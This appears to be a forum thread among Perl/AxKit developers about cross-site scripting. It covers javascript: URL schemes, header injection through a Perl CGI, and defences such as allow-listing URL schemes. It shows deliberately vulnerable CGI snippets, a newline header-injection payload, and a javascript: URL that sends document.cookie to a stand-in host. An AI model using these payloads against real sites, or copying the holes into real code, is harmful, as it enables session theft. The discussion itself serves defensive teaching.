  • Do I get it right that with AxKit it is impossible to inject new tags into output? If so, that makes opening XSS holes much harder, but not impossible, because XSS is not just the injection of dangerous tags into output. Imagine, for example, a public web service that lets people exchange URLs (call it "Shared bookmarks"). An obvious possible XSS hole is failing to verify that the scheme part of a submitted URL is free of dangerous schemes like 'javascript' (a sketch of this follows below). I doubt AxKit can automatically protect against this kind of programming error.
    --

    Ilya Martynov (http://martynov.org/)
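
    To make the hole concrete, here is a minimal sketch of such a bookmark page as a Perl CGI; the script and parameter names are made up for illustration:

      use strict;
      use warnings;
      use CGI;

      my $cgi = CGI->new;
      my $url = $cgi->param('url') || '';   # user-submitted bookmark

      print $cgi->header('text/html');

      # VULNERABLE: the submitted URL goes straight into an href, so a value
      # like "javascript:alert(document.cookie)" becomes a live link even
      # though no new tags were injected and no angle brackets ever appear.
      print qq{<a href="$url">shared bookmark</a>\n};

    Escaping < and > does nothing for you here; the attack lives entirely in the scheme of the URL.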

    • You're absolutely right, and I'm no security expert, so just how much damage can you do with the javascript: scheme? Is it limited to one function call, or can you chain lots of javascript into one method?
      • At least with Mozilla you can chain several function calls. BTW there are other types of XSS attacks which, as I understand it, AxKit cannot protect against, like arbitrary user input passed into response HTTP headers.
        --

        Ilya Martynov (http://martynov.org/)

        • arbitrary user input passed into response HTTP headers.

          Mind explaining how this works? I still don't know enough about XSS, but it's a technique that has fascinated me ever since I watched Jeffrey Baker demo it at the Open Source Conference 2.5 years ago.
          • Take this perl CGI for example:

            use CGI;

            my $cgi = CGI->new;
            # print headers by hand, echoing the user-supplied value verbatim
            print "Content-type: text/html\n";
            print "Set-Cookie: cookie=" . $cgi->param('cookie') . "\n";
            print "\n";
            # print content
            print "<html>.....</html>";

            An attacker can pass something like "\n\n<script>....</script>" as the value of the "cookie" parameter, so this CGI ends up printing:

            Content-type: text/html
            Set-Cookie: cookie=

            <script>...</script>

            <html>.....</html>

            See? Since arbitrary user input ends up in the response headers, embedded newlines let the attacker close the header block early and smuggle script markup into the body. (The usual fix is sketched below.)

            --

            Ilya Martynov (http://martynov.org/)
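
            The usual fix is to make sure nothing user-supplied can carry CR or LF into a header line; a minimal sketch of that (not from the original post):

              use CGI;

              my $cgi = CGI->new;
              my $cookie = $cgi->param('cookie') || '';

              # Strip carriage returns and newlines so the value cannot end
              # the header block early and start injecting markup.
              $cookie =~ s/[\r\n]//g;

              print "Content-type: text/html\n";
              print "Set-Cookie: cookie=$cookie\n";
              print "\n";
              print "<html>.....</html>";

            Letting CGI.pm or CGI::Cookie assemble the Set-Cookie header for you is another way to avoid hand-building header lines from raw input.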

      • I don't think it's limited to one call, but even if it is, you always have Good Ol' eval() there, so it doesn't make much of a difference I'm afraid.

        --

        -- Robin Berjon [berjon.com]

        • OK, so given any link you have to check that it starts with /^(https?|ftp):/. Sounds fairly straightforward (though I don't think I do any checking in the AxKit wiki).

          Still, I think overall that means you've got a lot less coding to do with AxKit than with other (inferior ;-) solutions.
          • One advantage AxKit has re XSS is that it will be more likely than other solutions to blow up when given some treacherous charset, especially if you do character conversion from UTF-8 to Latin-X at the end. Apart from that, it's probably just as open as anything that deals with user-provided content.

            I'm not sure there's much to protecting the Wiki. A Wiki is, by definition, well, XSS enabled :) It pretty much works based on trusting other people. At any rate if you want to protect against javascript URLs, I'd check on !/

            --

            -- Robin Berjon [berjon.com]

            • I'm not sure there's much to protecting the Wiki

              Very, very, very wrong. The security model of client-side scripting is that there is a single trust zone per hostname. If you have, say, a properly coded ecommerce shop and a wiki with XSS bugs sitting on the same domain, then the ecommerce shop is also vulnerable. The attacker only needs to lure an ecommerce shop user onto the part of the wiki with the XSS bug and, bummer, the user's auth cookie is known to the "bad" guy.

              --

              Ilya Martynov (http://martynov.org/)

              • Oh yeah, that I know. I was thinking about axkit.org. And I must say I haven't seen many Wikis that were on the same domain as an e-commerce site; it would be quite dangerous imho. There are so many ways to get JS code to run (URLs, cookie-munging, on* event handlers, redirects, script elements...).

                --

                -- Robin Berjon [berjon.com]

            • I'd explicitly list "good" schemes and reject all others (a sketch of that follows below). Various browsers used to support various dangerous schemes in addition to javascript. For example, I recall some versions of MSIE had a bug which allowed running javascript via the about: scheme.
              --

              Ilya Martynov (http://martynov.org/)
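
              A minimal sketch of that allow-list approach using the URI module (the particular set of schemes here is only an example):

                use URI;

                my %allowed = map { $_ => 1 } qw(http https ftp mailto);

                sub url_is_safe {
                    my ($url) = @_;
                    my $scheme = URI->new($url)->scheme;
                    # Relative URLs have no scheme; this sketch lets them through.
                    return 1 unless defined $scheme;
                    return $allowed{ lc $scheme } ? 1 : 0;
                }

              Checking what is allowed, rather than what is known to be bad, is what covers oddities like the about: bug mentioned above.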

              • Depends on what kind of security you want. For axkit.org's Wiki I'd allow everything, including javascript:, so that we can have bookmarklets in there. For a site that has sensitive information I wouldn't use a Wiki.

                --

                -- Robin Berjon [berjon.com]

                • Too late. Pod::SAX now explicitly only allows (https?|ftp|mailto|s?news|nntp).

                  Javascript is just too dangerous.

                  There are probably still bugs in the wiki in that it allows XML input, so you may be able to sneak something by that way, but hopefully the XSLT should disallow anything but known tags (and filter attributes sanely).
      • I forget the exact code, but you can do something like javascript:document.open("http://www.example.com/stealcookie.pl?cookie=" + document.cookie). You really need to explicitly check for JavaScript, which also means checking for derivatives like ecmascript:, as well as all the URL-encoded forms (encoding into %xx). IIRC, we URI-unescape it in Slash, then check the scheme against /script$/.
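
        Roughly, the kind of check described above might look like this (a sketch, not the actual Slash code):

          use URI;
          use URI::Escape qw(uri_unescape);

          sub looks_like_script_url {
              my ($url) = @_;
              # Undo %xx encoding first so "javascript" can't hide as "%6Aavascript".
              my $decoded = uri_unescape($url);
              my $scheme  = URI->new($decoded)->scheme;
              return 0 unless defined $scheme;
              # Catches javascript:, ecmascript:, vbscript: -- anything ending in "script".
              return lc($scheme) =~ /script$/ ? 1 : 0;
          }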